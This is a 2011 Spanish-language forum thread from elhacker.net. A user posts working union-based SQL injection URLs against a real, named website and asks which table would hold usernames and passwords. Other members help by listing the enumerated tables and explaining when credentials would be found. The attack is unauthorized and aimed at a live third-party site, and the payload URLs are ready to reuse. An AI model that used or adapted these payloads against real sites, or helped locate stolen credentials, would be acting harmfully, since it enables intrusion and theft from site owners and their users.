Problema SQLi real/practico

Søra · 23 Septiembre 2011, 21:24 PM

Ola a todos nunca me habia interesado por el tipo de ataque SQLi pero hacia mucho que no trataba con la informatica y e decidido empezar por ahi esta vez. He llegado a esto:

http://www.feldgrau.com/search.php?ID=1%20and%201=0%20union%20all%20select%201,2,3,group_concat%28table_name%29,5,6+from+information_schema.tables--

Se que no se suele poner la pagina que de verdad estas atacando pero si no lo pongo no tiene sentido mi pregunta... mi pregunta es: ¿Que columna puede ser la que contenga los datos interesantes (contrasueña/nombre de usuario)?

He revisado varias de ellas y por ejemplo al poner:

.php?ID=1+and+1=0+union+all+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=char(KEY_COLUMN_USAGE en ASCII)--

Me muestra que las columnas son KEY_COLUMN_USAGE repetidas veces y al pedir que me de el contenido de las columnas no pone nada...

No se si he usado la terminologia correcta, seguramente no pero espero que hayan entendido mi duda y alguien me pueda ayudar.

Perdon de nuevo por poner la url real pero esto es meramente didactico y espero no encontrarme la pagina defaceada!

Un saludo Søra

Slava_TZD · 23 Septiembre 2011, 21:58 PM

Sinceramente no hay ninguna tabla que llame la atención, excepto donations, officers, search y subscribe que no tienen nada de interés...

Søra · 23 Septiembre 2011, 22:04 PM

Y eso que quiere decir? que no hay registro en la pagina?

.:UND3R:. · 23 Septiembre 2011, 22:26 PM

Cita de: Søra en 23 Septiembre 2011, 22:04 PM
Y eso que quiere decir? que no hay registro en la pagina?

Algo así

~ Yoya ~ · 23 Septiembre 2011, 23:59 PM

Si la pagina tiene un sistema de logueo dinámico encontraras usuario y pass. Si no tiene entonce no encontraras nada sobre eso.

Test Foro de elhacker.net SMF 2.1

Problema SQLi real/practico

Søra

Slava_TZD

Søra

.:UND3R:.

~ Yoya ~